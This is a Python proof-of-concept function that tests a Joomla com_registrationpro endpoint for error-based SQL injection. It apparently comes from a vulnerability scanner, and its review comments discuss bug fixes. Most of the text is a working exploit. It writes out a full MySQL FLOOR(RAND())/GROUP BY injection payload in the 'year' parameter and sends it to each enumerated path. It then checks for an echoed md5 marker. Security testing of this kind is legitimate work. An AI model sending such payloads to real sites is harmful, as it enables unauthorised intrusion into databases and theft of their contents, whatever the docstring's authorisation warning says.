(url)
| 21 | |
| 22 | |
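def poc(url):
    """Probe *url* for the com_registrationpro error-based SQL injection.

    Each path yielded by ``iterate_path(url)`` receives one GET whose
    ``year`` parameter carries a MySQL duplicate-key payload
    (``FLOOR(RAND(0)*2)`` with ``GROUP BY``): when the target echoes the
    database error into the page, the ``md5(<random>)`` value embedded in
    that payload shows up in the response body, and that echo is the only
    detection signal used here.

    Args:
        url: Target base URL; a bare host is prefixed with ``http://``.

    Returns:
        The first path whose response contains the marker, or ``False`` when
        no path did (including the case where every request failed).

    Note:
        This sends a live SQL-injection payload to the target; run it only
        against systems you are authorised to test.
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # The payload starts with "?", so a path that already carries a query
        # string cannot take it verbatim; skip before doing any work for it.
        if '?' in each:
            continue
        # A fresh marker per request (presumably so a reply left over from an
        # earlier probe cannot be mistaken for a hit on this path).
        plain, cipher = randomMD5(3)
        payload = (
            "/index.php?option=com_registrationpro&view=calendar&Itemid=27"
            "&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),"
            "CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),"
            "1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM "
            "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        ).format(plain=plain)
        # Probe the enumerated path rather than the base URL: the original
        # built every request from `url`, so the loop re-tested the same
        # address and then returned an untested `each` on a hit.
        # NOTE(review): this assumes iterate_path yields full URLs (it is fed
        # `url` and `each` is returned as the hit) -- confirm; if it yields
        # bare paths, join them onto `url` here instead.
        target_url = each.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
        except requests.RequestException:
            # Transport failure for this path only (timeout, DNS, refused);
            # move on instead of silently swallowing every exception type.
            continue
        # NOTE(review): assumes randomMD5 returns the hex md5 of `plain` as a
        # str (Python 2 semantics); on Python 3 r.content is bytes and this
        # comparison would need r.text or an encoded marker -- confirm.
        if cipher in r.content:
            return each
    return False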